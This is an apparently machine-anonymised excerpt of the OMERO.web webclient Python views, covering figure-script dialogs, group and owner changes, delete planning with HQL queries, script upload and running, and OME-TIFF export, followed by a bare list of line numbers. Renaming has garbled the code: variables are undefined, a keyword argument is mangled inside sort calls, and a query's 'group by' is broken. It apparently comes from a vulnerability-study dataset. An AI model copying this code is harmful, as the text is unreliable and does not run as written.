VAR_325 = [int(VAR_40) for VAR_40 in VAR_187.split(",")]
VAR_326 = {}
for VAR_38 in VAR_6.getObjects(VAR_215, VAR_325):
VAR_326[VAR_38.id] = VAR_38
VAR_327 = [VAR_41 for VAR_41 in VAR_325 if VAR_41 in VAR_326.keys()]
if len(VAR_327) == 0:
raise Http404("No %ss found with IDs %s" % (VAR_215, VAR_187))
else:
VAR_337 = list(VAR_326.values())[0].getDetails().group.id.val
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_337)
return VAR_327, VAR_326
VAR_53 = {}
if VAR_212 is not None:
VAR_212, VAR_328 = FUNC_86("Image", VAR_212)
VAR_53["idString"] = ",".join([VAR_347(VAR_320) for VAR_320 in VAR_212])
VAR_53["dtype"] = "Image"
if VAR_213 is not None:
VAR_213, VAR_329 = FUNC_86("Dataset", VAR_213)
VAR_53["idString"] = ",".join([VAR_347(VAR_320) for VAR_320 in VAR_213])
VAR_53["dtype"] = "Dataset"
if VAR_43 == "SplitView":
VAR_330 = "/omero/figure_scripts/Split_View_Figure.py"
VAR_54 = "webclient/VAR_203/split_view_figure.html"
VAR_331 = [] # A list of VAR_158 about each VAR_142.
for VAR_432 in VAR_212:
VAR_158 = {"id": VAR_432}
VAR_370 = VAR_328[VAR_432]
VAR_158["name"] = VAR_370.getName()
VAR_164 = [
VAR_180.getTextValue()
for VAR_180 in VAR_370.listAnnotations()
if VAR_180._obj.__class__ == omero.model.TagAnnotationI
]
VAR_158["tags"] = VAR_164
VAR_158["datasets"] = [VAR_364.getName() for VAR_364 in VAR_370.listParents()]
VAR_331.append(VAR_158)
VAR_142 = VAR_328[VAR_212[0]]
VAR_53["imgDict"] = VAR_331
VAR_53["image"] = VAR_142
VAR_53["channels"] = VAR_142.getChannels()
elif VAR_43 == "Thumbnail":
VAR_330 = "/omero/figure_scripts/Thumbnail_Figure.py"
VAR_54 = "webclient/VAR_203/thumbnail_figure.html"
def FUNC_89(VAR_212):
VAR_408 = VAR_6.getAnnotationLinks("Image", parent_ids=VAR_212)
VAR_409 = {} # VAR_101 VAR_164. {VAR_26: [VAR_164]}
VAR_410 = {}
for VAR_432 in VAR_212:
VAR_409[VAR_432] = []
for VAR_346 in VAR_408:
VAR_383 = VAR_346.getChild()
if VAR_383._obj.__class__ == omero.model.TagAnnotationI:
VAR_410[VAR_383.id] = VAR_383
VAR_409[VAR_346.getParent().id].append(VAR_383)
VAR_411 = []
for VAR_432 in VAR_212:
VAR_411.append({"id": VAR_432, "tags": VAR_409[VAR_432]})
VAR_164 = []
for tId, VAR_433 in VAR_410.items():
VAR_164.append(VAR_433)
return VAR_411, VAR_164
VAR_371 = [] # multiple collections of VAR_106
VAR_164 = []
VAR_372 = "Thumbnail_Figure"
if VAR_213 is not None:
for VAR_364 in VAR_6.getObjects("Dataset", VAR_213):
VAR_306 = [VAR_320.id for VAR_320 in VAR_364.listChildren()]
VAR_411, VAR_412 = FUNC_89(VAR_306)
VAR_371.append({"name": VAR_364.getName(), "imageTags": VAR_411})
VAR_164.extend(VAR_412)
VAR_372 = VAR_371[0]["name"]
else:
VAR_411, VAR_412 = FUNC_89(VAR_212)
VAR_371.append({"name": "images", "imageTags": VAR_411})
VAR_164.extend(VAR_412)
VAR_413 = VAR_6.getObject("Image", VAR_212[0]).getParent()
VAR_372 = VAR_413.getName() or "Thumbnail Figure"
VAR_53["parent_id"] = VAR_413.getId()
VAR_373 = set() # remove duplicates
VAR_374 = []
for VAR_433 in VAR_164:
if VAR_433.id not in VAR_373:
VAR_374.append(VAR_433)
VAR_373.add(VAR_433.id)
VAR_374.sort(VAR_312=lambda x: x.getTextValue().lower())
VAR_53["thumbSets"] = VAR_371
VAR_53["tags"] = VAR_374
VAR_53["figureName"] = VAR_372.replace(" ", "_")
elif VAR_43 == "MakeMovie":
VAR_330 = "/omero/export_scripts/Make_Movie.py"
VAR_54 = "webclient/VAR_203/make_movie.html"
VAR_142 = VAR_6.getObject("Image", VAR_212[0])
VAR_414 = VAR_142.getName().rsplit(".", 1)
if len(VAR_414) > 1 and len(VAR_414[1]) > 3:
VAR_414 = ".".join(VAR_414)
else:
VAR_414 = movieName[0]
VAR_53["movieName"] = os.path.basename(VAR_414)
VAR_282 = []
for VAR_383 in VAR_142.getChannels():
VAR_282.append(
{
"active": VAR_383.isActive(),
"color": VAR_383.getColor().getHtml(),
"label": VAR_383.getLabel(),
}
)
VAR_53["channels"] = VAR_282
VAR_53["sizeT"] = VAR_142.getSizeT()
VAR_53["sizeZ"] = VAR_142.getSizeZ()
VAR_202 = VAR_6.getScriptService()
VAR_42 = VAR_202.getScriptID(VAR_330)
if VAR_42 < 0:
raise AttributeError("No script found for VAR_316 '%s'" % VAR_330)
VAR_53["template"] = VAR_54
VAR_53["scriptId"] = VAR_42
return VAR_53
@login_required()
@render_response()
def FUNC_70(VAR_2, VAR_27, VAR_6=None, **VAR_7):
VAR_216 = {}
for VAR_215 in ("Image", "Dataset", "Project"):
VAR_187 = VAR_2.GET.get(VAR_215, None)
if VAR_187 is not None:
VAR_216[VAR_215] = [int(VAR_320) for VAR_320 in VAR_187.split(",")]
VAR_217 = VAR_6.getContainerService().getImagesBySplitFilesets(
VAR_216, None, VAR_6.SERVICE_OPTS
)
VAR_218 = []
for fsId, splitIds in VAR_217.items():
VAR_218.append(
{
"id": fsId,
"attempted_iids": splitIds[True],
"blocking_iids": splitIds[False],
}
)
VAR_53 = {"split_filesets": VAR_218}
VAR_53["action"] = VAR_27
if VAR_27 == "chgrp":
VAR_53["action"] = "move"
VAR_53["template"] = "webclient/FUNC_63/" "fileset_check_dialog_content.html"
return VAR_53
def FUNC_71(
VAR_6, VAR_44, VAR_45, VAR_46, VAR_47, VAR_48, VAR_11
):
VAR_73 = omero.sys.ParametersI()
VAR_74 = VAR_6.getQueryService()
VAR_44 = set(VAR_44)
VAR_45 = set(VAR_45)
VAR_46 = set(VAR_46)
VAR_219 = set([])
VAR_48 = set(VAR_48)
VAR_47 = set(VAR_47)
if VAR_44:
VAR_73.map = {}
VAR_73.map["pids"] = rlist([rlong(x) for x in list(VAR_44)])
VAR_75 = """
select pdlink.child.id
from ProjectDatasetLink pdlink
where pdlink.parent.id in (:pids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_45.add(e[0].val)
if VAR_47:
VAR_73.map = {}
VAR_73.map["sids"] = rlist([rlong(x) for x in VAR_47])
VAR_75 = """
select splink.child.id
from ScreenPlateLink splink
where splink.parent.id in (:sids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_48.add(e[0].val)
if VAR_45:
VAR_73.map = {}
VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
VAR_75 = """
select dilink.child.id,
dilink.child.fileset.id
from DatasetImageLink dilink
where dilink.parent.id in (:dids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_46.add(e[0].val)
if e[1] is not None:
VAR_219.add(e[1].val)
if VAR_48:
VAR_73.map = {}
VAR_73.map["plids"] = rlist([rlong(x) for x in VAR_48])
VAR_75 = """
select ws.image.id
from WellSample ws
join ws.plateAcquisition pa
where pa.plate.id in (:plids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_46.add(e[0].val)
if VAR_219:
VAR_73.map = {}
VAR_73.map["fsids"] = rlist([rlong(x) for x in VAR_219])
VAR_75 = """
select VAR_142.id
from Image VAR_142
left outer join VAR_142.datasetLinks dilink
where VAR_142.fileset.id in (select VAR_365.id
from Image im
join im.fileset VAR_365
where VAR_365.id in (:fsids)
VAR_101 by VAR_365.id
having count(im.id)>1)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_46.add(e[0].val)
VAR_220 = set([])
VAR_221 = False
if VAR_46:
VAR_73.map = {
"iids": rlist([rlong(x) for x in VAR_46]),
}
VAR_332 = ""
if VAR_45:
VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
VAR_332 = """
and (
dilink.parent.id not in (:dids)
or dilink.parent.id = null
)
"""
VAR_75 = (
"""
select distinct dilink.parent.id
from Image VAR_142
left outer join VAR_142.datasetLinks dilink
where VAR_142.id in (:VAR_153)
%s
and (select count(dilink2.child.id)
from DatasetImageLink dilink2
where dilink2.parent.id = dilink.parent.id
and dilink2.child.id not in (:VAR_153)) = 0
"""
% VAR_332
)
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
if e:
VAR_220.add(e[0].val)
else:
VAR_221 = True
VAR_222 = set([])
if VAR_45:
VAR_73.map = {"dids": rlist([rlong(x) for x in VAR_45])}
VAR_333 = ""
if VAR_44:
VAR_73.map["pids"] = rlist([rlong(x) for x in VAR_44])
VAR_333 = "and pdlink.parent.id not in (:pids)"
VAR_75 = (
"""
select distinct pdlink.parent.id
from ProjectDatasetLink pdlink
where pdlink.child.id in (:dids)
%s
and (select count(pdlink2.child.id)
from ProjectDatasetLink pdlink2
where pdlink2.parent.id = pdlink.parent.id
and pdlink2.child.id not in (:dids)) = 0
"""
% VAR_333
)
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_222.add(e[0].val)
VAR_223 = {
"remove": {
"project": list(VAR_44),
"dataset": list(VAR_45),
"screen": list(VAR_47),
"plate": list(VAR_48),
"image": list(VAR_46),
},
"childless": {
"project": list(VAR_222),
"dataset": list(VAR_220),
"orphaned": VAR_221,
},
}
return VAR_223
@require_POST
@login_required()
def FUNC_72(VAR_2, VAR_6=None, **VAR_7):
return FUNC_73(VAR_2, VAR_27="chgrp", VAR_6=conn, **VAR_7)
@require_POST
@login_required()
def FUNC_73(VAR_2, VAR_27, VAR_6=None, **VAR_7):
VAR_224 = {}
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_224[VAR_215] = VAR_144
if VAR_27 == "chgrp":
VAR_334 = getIntOrDefault(VAR_2, "group_id", None)
elif VAR_27 == "chown":
VAR_334 = getIntOrDefault(VAR_2, "owner_id", None)
VAR_84 = VAR_6.submitDryRun(VAR_27, VAR_224, VAR_334)
VAR_198 = VAR_347(VAR_84)
return HttpResponse(VAR_198)
@login_required()
def FUNC_74(VAR_2, VAR_6=None, **VAR_7):
if not VAR_2.method == "POST":
return JsonResponse({"Error": "Need to POST to chgrp"}, VAR_315=405)
VAR_20 = getIntOrDefault(VAR_2, "group_id", None)
if VAR_20 is None:
return JsonResponse({"Error": "chgrp: No VAR_20 specified"})
VAR_20 = VAR_241(VAR_20)
def FUNC_87(VAR_71):
for VAR_433 in ["Dataset", "Image", "Plate"]:
VAR_187 = VAR_71.POST.get(VAR_433, None)
if VAR_187 is not None:
for o in list(VAR_6.getObjects(VAR_433, VAR_187.split(","))):
return o.getDetails().owner.id.val
VAR_101 = VAR_6.getObject("ExperimenterGroup", VAR_20)
VAR_226 = VAR_2.POST.get("new_container_name", None)
VAR_227 = VAR_2.POST.get("new_container_type", None)
VAR_228 = None
VAR_229 = FUNC_87(VAR_2)
VAR_6.SERVICE_OPTS.setOmeroUser(VAR_229)
if (
VAR_226 is not None
and len(VAR_226) > 0
and VAR_227 is not None
):
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_20)
VAR_228 = VAR_6.createContainer(VAR_227, VAR_226)
if VAR_228 is None:
VAR_334 = VAR_2.POST.get("target_id", None)
VAR_228 = VAR_334 is not None and VAR_334.split("-")[1] or None
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_307 = VAR_2.POST.getlist("fileset")
if len(VAR_307) > 0:
if VAR_215 == "Dataset":
VAR_6.regroupFilesets(dsIds=VAR_144, VAR_307=fsIds)
else:
for VAR_365 in VAR_6.getObjects("Fileset", VAR_307):
VAR_144.extend([VAR_320.id for VAR_320 in VAR_365.copyImages()])
VAR_144 = list(set(VAR_144)) # remove duplicates
VAR_0.debug("chgrp to VAR_101:%s %s-%s" % (VAR_20, VAR_215, VAR_144))
VAR_84 = VAR_6.chgrpObjects(VAR_215, VAR_144, VAR_20, VAR_228)
VAR_198 = VAR_347(VAR_84)
VAR_2.session["callback"][VAR_198] = {
"job_type": "chgrp",
"group": VAR_101.getName(),
"to_group_id": VAR_20,
"dtype": VAR_215,
"obj_ids": VAR_144,
"job_name": "Change group",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
VAR_2.session.modified = True
VAR_44 = VAR_2.POST.get("Project", [])
VAR_45 = VAR_2.POST.get("Dataset", [])
VAR_46 = VAR_2.POST.get("Image", [])
VAR_47 = VAR_2.POST.get("Screen", [])
VAR_48 = VAR_2.POST.get("Plate", [])
if VAR_44:
project_ids = [VAR_241(x) for x in VAR_44.split(",")]
if VAR_45:
dataset_ids = [VAR_241(x) for x in VAR_45.split(",")]
if VAR_46:
image_ids = [VAR_241(x) for x in VAR_46.split(",")]
if VAR_47:
screen_ids = [VAR_241(x) for x in VAR_47.split(",")]
if VAR_48:
plate_ids = [VAR_241(x) for x in VAR_48.split(",")]
VAR_230 = FUNC_71(
VAR_6,
VAR_44,
VAR_45,
VAR_46,
VAR_47,
VAR_48,
VAR_2.session.get("user_id"),
)
return JsonResponse({"update": VAR_230})
@login_required()
def FUNC_75(VAR_2, VAR_6=None, **VAR_7):
if not VAR_2.method == "POST":
return JsonResponse({"Error": "Need to POST to chown"}, VAR_315=405)
VAR_231 = getIntOrDefault(VAR_2, "owner_id", None)
if VAR_231 is None:
return JsonResponse({"Error": "chown: No VAR_231 specified"})
VAR_231 = int(VAR_231)
VAR_232 = VAR_6.getObject("Experimenter", VAR_231)
if VAR_232 is None:
return JsonResponse({"Error": "chown: Experimenter not found" % VAR_231})
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
VAR_233 = []
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_0.debug("chown to VAR_103:%s %s-%s" % (VAR_231, VAR_215, VAR_144))
VAR_84 = VAR_6.chownObjects(VAR_215, VAR_144, VAR_231)
VAR_198 = VAR_347(VAR_84)
VAR_233.append(VAR_198)
VAR_2.session["callback"][VAR_198] = {
"job_type": "chown",
"owner": VAR_232.getFullName(),
"to_owner_id": VAR_231,
"dtype": VAR_215,
"obj_ids": VAR_144,
"job_name": "Change owner",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
VAR_2.session.modified = True
return JsonResponse({"jobIds": VAR_233})
@login_required(setGroupContext=True)
def FUNC_76(VAR_2, VAR_42, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
VAR_50 = {}
VAR_49 = VAR_241(VAR_42)
try:
VAR_73 = VAR_202.getParams(VAR_49)
except Exception as x:
if x.message and x.message.startswith("No processor available"):
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script")
return JsonResponse(VAR_174)
else:
raise
VAR_73 = VAR_202.getParams(VAR_49)
VAR_43 = VAR_73.name.replace("_", " ").replace(".py", "")
VAR_0.debug("Script: run with VAR_2.POST: %s" % VAR_2.POST)
VAR_234 = (
"file_annotation" in VAR_2.FILES and VAR_2.FILES["file_annotation"] or None
)
VAR_235 = None
if VAR_234 is not None and VAR_234 != "":
VAR_104 = BaseContainer(VAR_6)
VAR_235 = VAR_104.createFileAnnotations(VAR_234, [])
for VAR_312, VAR_322 in VAR_73.inputs.items():
VAR_335 = VAR_322.prototype
VAR_336 = VAR_335.__class__
if VAR_312 == "File_Annotation" and VAR_235 is not None:
VAR_50[VAR_312] = VAR_336(VAR_347(VAR_235))
continue
if VAR_336 == omero.rtypes.RBoolI:
VAR_375 = VAR_312 in VAR_2.POST
VAR_50[VAR_312] = VAR_336(VAR_375)
continue
if VAR_336.__name__ == "RMapI":
VAR_376 = "%s_key0" % VAR_312
VAR_377 = "%s_value0" % VAR_312
VAR_378 = 0
VAR_379 = {}
while VAR_376 in VAR_2.POST:
VAR_415 = VAR_347(VAR_2.POST[VAR_376])
VAR_416 = VAR_2.POST[VAR_377]
if len(VAR_415) > 0 and len(VAR_416) > 0:
VAR_379[VAR_347(VAR_415)] = VAR_416
VAR_378 += 1
VAR_376 = "%s_key%d" % (VAR_312, VAR_378)
VAR_377 = "%s_value%d" % (VAR_312, VAR_378)
if len(VAR_379) > 0:
VAR_50[VAR_312] = wrap(VAR_379)
continue
if VAR_312 in VAR_2.POST:
if VAR_336 == omero.rtypes.RListI:
VAR_417 = VAR_2.POST.getlist(VAR_312)
if len(VAR_417) == 0:
continue
if len(VAR_417) == 1: # process comma-separated list
if len(VAR_417[0]) == 0:
continue
VAR_417 = values[0].split(",")
VAR_418 = omero.rtypes.RStringI
VAR_419 = VAR_335.val # list
if len(VAR_419) > 0:
VAR_418 = VAR_419[0].__class__
if VAR_418 == int(1).__class__:
VAR_418 = omero.rtypes.rint
if VAR_418 == VAR_241(1).__class__:
VAR_418 = omero.rtypes.rlong
VAR_420 = []
for VAR_416 in VAR_417:
try:
VAR_38 = VAR_418(VAR_416.strip())
except Exception:
VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_312, VAR_416))
continue
if isinstance(VAR_38, omero.model.IObject):
VAR_420.append(omero.rtypes.robject(VAR_38))
else:
VAR_420.append(VAR_38)
VAR_50[VAR_312] = omero.rtypes.rlist(VAR_420)
else:
VAR_375 = VAR_2.POST[VAR_312]
if len(VAR_375) == 0:
continue
try:
VAR_50[VAR_312] = VAR_336(VAR_375)
except Exception:
VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_312, VAR_375))
continue
if "IDs" in VAR_50 and "Data_Type" in VAR_50:
VAR_337 = VAR_6.SERVICE_OPTS.getOmeroGroup()
VAR_6.SERVICE_OPTS.setOmeroGroup("-1")
try:
VAR_380 = VAR_6.getObject(
VAR_50["Data_Type"].val, unwrap(VAR_50["IDs"])[0]
)
VAR_381 = VAR_380.getDetails().group.id.val
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_381)
except Exception:
VAR_0.debug(traceback.format_exc())
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_337)
try:
VAR_0.debug("Running script %s with " "params %s" % (VAR_43, VAR_50))
except Exception:
pass
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43)
return JsonResponse(VAR_174)
@login_required(isAdmin=True)
@render_response()
def FUNC_77(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
return {"template": "webclient/VAR_203/upload_script.html"}
VAR_236 = VAR_2.POST.get("script_path")
VAR_237 = VAR_2.FILES["script_file"]
VAR_237.seek(0)
VAR_238 = VAR_237.read().decode("utf-8")
if not VAR_236.endswith("/"):
VAR_236 = script_path + "/"
VAR_236 = script_path + VAR_237.name
VAR_202 = VAR_6.getScriptService()
VAR_239 = VAR_202.getScriptID(VAR_236)
try:
if VAR_239 > 0:
VAR_173 = OriginalFileI(VAR_239, False)
VAR_202.editScript(VAR_173, VAR_238)
VAR_382 = "Script Replaced: %s" % VAR_237.name
else:
VAR_239 = VAR_202.uploadOfficialScript(VAR_236, VAR_238)
VAR_382 = "Script Uploaded: %s" % VAR_237.name
except omero.ValidationException as ex:
VAR_382 = VAR_347(ex)
return {"Message": VAR_382, "script_id": VAR_239}
@require_POST
@login_required()
def FUNC_78(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
VAR_49 = VAR_202.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
VAR_142 = VAR_6.getObject("Image", VAR_26)
if VAR_142 is not None:
VAR_337 = VAR_142.getDetails().group.id.val
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_337)
VAR_212 = [VAR_241(VAR_26)]
VAR_50 = {
"Data_Type": wrap("Image"),
"IDs": rlist([rlong(id) for id in VAR_212]),
}
VAR_50["Format"] = wrap("OME-TIFF")
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Create OME-TIFF")
return JsonResponse(VAR_174)
def FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script"):
VAR_2.session.modified = True
VAR_202 = VAR_6.getScriptService()
try:
VAR_84 = VAR_202.runScript(VAR_49, VAR_50, None, VAR_6.SERVICE_OPTS)
VAR_198 = VAR_347(VAR_84)
VAR_315 = "in progress"
VAR_2.session["callback"][VAR_198] = {
"job_type": "script",
"job_name": VAR_43,
"start_time": datetime.datetime.now(),
"status": VAR_315,
}
VAR_2.session.modified = True
except Exception as x:
VAR_198 = VAR_347(time()) # E.g. 1312803670.6076391
VAR_382 = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
if VAR_382 and VAR_382.startswith("No processor available"):
VAR_0.info(traceback.format_exc())
VAR_57 = "No Processor Available"
VAR_315 = "no processor available"
VAR_382 = "" # VAR_54 displays VAR_382 and VAR_346
else:
if isinstance(x, omero.ValidationException):
VAR_0.debug(x.message)
else:
VAR_0.error(traceback.format_exc())
VAR_57 = traceback.format_exc()
VAR_315 = "failed"
VAR_382 = x.message
VAR_2.session["callback"][VAR_198] = {
"job_type": "script",
"job_name": VAR_43,
"start_time": datetime.datetime.now(),
"status": VAR_315,
"Message": VAR_382,
"error": VAR_57,
}
return {"status": VAR_315, "error": VAR_57}
return {"jobId": VAR_198, "status": VAR_315}
@login_required()
@render_response()
def FUNC_80(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_240 = list(
VAR_6.getAnnotationLinks(
"Image", [VAR_26], VAR_90=omero.constants.namespaces.NSOMETIFF
)
)
VAR_172 = {}
if len(VAR_240) > 0:
VAR_240.sort(VAR_312=lambda x: x.getId(), VAR_352=True)
VAR_338 = VAR_240[0]
VAR_293 = VAR_338.creationEventDate()
VAR_34 = VAR_338.getChild().getId()
from omeroweb.webgateway.templatetags.common_filters import ago
VAR_31 = VAR_352("download_annotation", args=[VAR_34])
VAR_172 = {
"created": VAR_347(VAR_293),
"ago": ago(VAR_293),
"id": VAR_34,
"download": VAR_31,
}
return VAR_172 # will FUNC_81 returned as json by VAR_4
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
24,
39,
41,
44,
48,
50,
67,
68,
80,
85,
87,
91,
93,
108,
125,
127,
132,
134,
136,
137,
138,
140,
141,
146,
155,
156,
160,
161,
167,
168,
173,
178,
179,
189,
190,
191,
192,
193,
194,
199,
209,
211,
212,
213,
214,
215,
216,
229,
232,
238,
245,
246,
247,
248,
249,
257,
260,
262,
263,
275,
281,
302,
305,
311,
329,
331,
332,
336,
337,
338,
340,
341,
351,
356,
357,
375,
376,
396,
397,
404,
418,
419,
420,
422,
432,
440,
442,
443,
445,
446,
451,
452,
454,
455,
457,
462,
463,
465,
466,
473,
474,
480,
481,
482,
486,
487,
489,
493,
494,
498,
504,
513,
516,
521,
523,
527,
529,
530,
539,
563,
565,
566,
571,
572,
582,
595,
598,
606,
607,
610,
617,
619,
629,
631,
632,
635,
640,
642,
646,
653,
660,
661,
664,
672,
673,
674,
675,
676,
677,
678,
681,
684,
692,
693,
702,
703,
711,
712,
721,
732,
748,
750,
751,
754,
762,
765,
767,
777,
779,
780,
790,
792,
805,
808,
809,
810,
811,
812,
814,
816,
836,
838,
839,
842,
850,
853,
855,
865,
867,
868,
871,
878,
879,
880,
883,
885,
895,
897,
898,
906,
907,
908,
924,
927,
929,
930,
941,
943,
950,
951,
956,
957,
990,
991,
1002,
1003,
1015,
1019,
1021,
1026,
1027,
1035,
1037,
1038,
1039,
1040,
1049,
1055,
1061,
1063,
1076,
1078,
1085,
1086,
1093,
1095,
1096,
1102,
1104,
1105,
1106,
1121,
1125,
1126,
1130,
1138,
1139,
1141,
1143,
1144,
1151,
1160,
1165,
1177,
1179,
1180,
1186,
1190,
1194,
1203,
1204,
1215,
1218,
1236,
1237,
1244,
1245,
1253,
1265,
1267,
1281,
1282,
1298,
1300,
1301,
1304,
1309,
1311,
1319,
1324,
1331,
1333,
1334,
1337,
1348,
1351,
1366,
1368,
1369,
1372,
1380,
1381,
1382,
1383,
1384,
1386,
1390,
1400,
1402,
1403,
1411,
1412,
1414,
1415,
1416,
1421,
1426,
1427,
1429,
1431,
1432,
1440,
1441,
1449,
1457,
1461,
1462,
1474,
1487,
1493,
1500,
1501,
1503,
1507,
1508,
1509,
1514,
1522,
1523,
1530,
1532,
1534,
1535,
1540,
1541,
1544,
1548,
1551,
1552,
1560,
1562,
1570,
1574,
1579,
1591,
1592,
1595,
1596,
1597,
1608,
1609,
1610,
1638,
1640,
1642,
1651,
1652,
1662,
1663,
1665,
1667,
1668,
1689,
1690,
1691,
1702,
1714,
1737,
1744,
1749,
1750,
1758,
1759,
1761,
1767,
1771,
1775,
1779,
1780,
1804,
1811,
1812,
1822,
1826,
1827,
1848,
1859,
1863,
1864,
1868,
1892,
1917,
1933,
1959,
1960,
1971,
1985,
1987,
1992,
1995,
2015,
2027,
2030,
2060,
2067,
2082,
2103,
2104,
2119,
2120,
2124,
2128,
2140,
2143,
2144,
2145,
2146,
2147,
2148,
2149,
2150,
2151,
2152,
2153,
2154,
2155,
2156,
2157,
2158,
2159,
2160,
2161,
2217,
2218,
2235,
2236,
2245,
2247,
2248,
2265,
2266,
2276,
2289,
2314,
2315,
2337,
2338,
2339,
2344,
2348,
2349,
2350,
2372,
2381,
2388,
2389,
2394,
2396,
2398,
2401,
2406,
2418,
2425,
2426,
2437,
2438,
2442,
2443,
2445,
2446,
2454,
2457,
2471,
2472,
2473,
2479,
2480,
2483,
2496,
2503,
2504,
2510,
2512,
2513,
2521,
2526,
2528,
2529,
2530,
2531,
2537,
2540,
2543,
2544,
2548,
2552,
2562,
2571,
2581,
2589,
2591,
2592,
2599,
2607,
2612,
2617,
2619,
2622,
2624,
2626,
2628,
2630,
2632,
2633,
2641,
2645,
2646,
2647,
2650,
2652,
2653,
2654,
2659,
2660,
2661,
2672,
2675,
2679,
2680,
2682,
2690,
2692,
2704,
2705,
2706,
2708,
2719,
2721,
2726,
2728,
2729,
2731,
2749,
2762,
2764,
2776,
2777,
2795,
2797,
2812,
2813,
2821,
2834,
2861,
2864,
2865,
2870,
2877,
2889,
2890,
2913,
2915,
2938,
2954,
2973,
2986,
3008,
3017,
3040,
3041,
3042,
3050,
3064,
3089,
3131,
3138,
3139,
3146,
3147,
3149,
3155,
3163,
3169,
3170,
3176,
3182,
3187,
3196,
3197,
3202,
3207,
3210,
3211,
3215,
3224,
3227,
3232,
3235,
3240,
3241,
3244,
3245,
3255,
3256,
3267,
3268,
3272,
3276,
3284,
3290,
3292,
3293,
3302,
3311,
3312,
3316,
3320,
3322,
3325,
3329,
3335,
3336,
3345,
3356,
3359,
3361,
3365,
3366,
3375,
3377,
3380,
3383,
3384,
3390,
3406,
3408,
3413,
3425,
3426,
3435,
3438,
3447,
3449,
3452,
3453,
3458,
3461,
3463,
3464,
3466,
3472,
3476,
3477,
3487,
3488,
3489,
3497,
3509,
3510,
3511,
3512,
3517,
3518,
3530,
3535,
3536,
3537,
3560,
3565,
3583,
3586,
3587,
3591,
3595,
3597,
3598,
3609,
3610,
3655,
3656,
3660,
3715,
3716,
3773,
3774,
3776,
3795,
3799,
3812,
3818,
3824,
3825,
3832,
3844,
3845,
3847,
3850,
3858,
3859,
3860,
3863,
3864,
3866,
3867,
3877,
3881,
3882,
3883,
3895,
3905,
3908,
3909,
3917,
3919,
3937,
3938,
3939,
3940,
3941,
3942,
3948,
3949,
3950,
3951,
3952,
3953,
3960,
3963,
3964,
3965,
3966,
3972,
3978,
3979,
3994,
3995,
3996,
3997,
3998,
4005,
4011,
4012,
4013,
4018,
4024,
4026,
4027,
4030,
4032,
4033,
4041,
4053,
4055,
4063,
4094,
4098,
4099,
4100,
4103,
4104,
4108,
4114,
4115,
4127,
4140,
4141,
4142,
4145,
4157,
4159,
4165,
4166,
4173,
4177,
4188,
4198,
4202,
4204,
4213,
4217,
4231,
4232,
4237,
4241,
4260,
4288,
4292,
4293,
4295,
4301,
4315,
4320,
4324,
4325,
4342,
4352,
4358,
4360,
4361,
4369,
4372,
4379,
4380,
4391,
4392,
4403,
4404,
4416,
4419,
4420,
4421,
4422,
4423,
4424,
4436,
4437,
4454,
4455,
4456,
4457,
4464,
4468,
4469,
4476,
4491,
4497,
4498,
4499,
4500,
4504,
4509,
4523,
4526,
4527,
4528,
4529,
4530,
4531,
4533,
4541,
4549,
4550,
4555,
4556,
4568,
4576,
4577,
4587,
4592,
4599,
4604,
4605,
4615,
4617,
4622,
4626,
4627,
4630,
4631,
4652,
4653,
4654,
4655,
4661,
4672,
4673,
4674,
4675,
4676,
4677,
4678,
4679,
4689,
4690,
4692,
4693,
4703,
4711,
4715,
4734,
4736,
4737,
4744,
4746,
4748,
4753,
4760,
4762,
4763,
4771,
4775,
4779,
4780,
4781,
4786,
4793,
4794,
4805,
4815,
4816,
4819,
4820,
4827,
4828,
4832,
4842,
4843,
4853,
4854,
4855,
4867,
4869,
4871,
4877,
4878,
4883,
4886,
4887,
4892,
4896,
4897,
4900,
4911,
4913,
4914,
4924,
4927,
4940,
4941,
4952,
4964,
4967,
4973,
4981,
4991,
4993,
4994,
5002,
5010,
5016,
5025,
20,
21,
22,
23,
143,
144,
145,
